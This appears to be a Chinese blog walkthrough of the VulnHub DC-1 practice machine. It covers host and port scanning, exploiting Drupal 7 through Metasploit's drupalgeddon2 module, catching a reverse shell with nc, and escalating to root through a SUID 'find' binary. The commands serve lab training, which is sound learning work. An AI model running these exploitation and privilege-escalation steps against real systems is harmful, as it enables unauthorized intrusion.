vulnhub DC-1靶场

发布时间 2023-12-11 19:25:06作者: 羲和跃明

1.扫描主机

sudo arp-scan -l

1 (2)

扫描端口

nmap -p- 192.168.42.147

3

扫描主机指纹,发现Drupal 7 cms

4

2.得到shell(2.1,2.2)只用一种即可

2.1开始msf漏洞利用

mfconsole

5

search drupal

search 7600

use exploit/unix/webapp/drupal_drupalgeddon2

6

set rhosts 192.168.42.147

run

7

2.2脚本exp得到反弹shell

找到脚本,修改脚本,执行脚本

3

5

6

nc 监听 8888 端口 得到反弹shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

7

3.mete7preter> 看到这个,说明成功拿下shell

shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

10

4.开始提权

find / -perm -u=s -type f 2>/dev/null

8

发现/usr/bin/find,利用提权

find . -exec /bin/sh \;

9

成功提权,寻找flag

11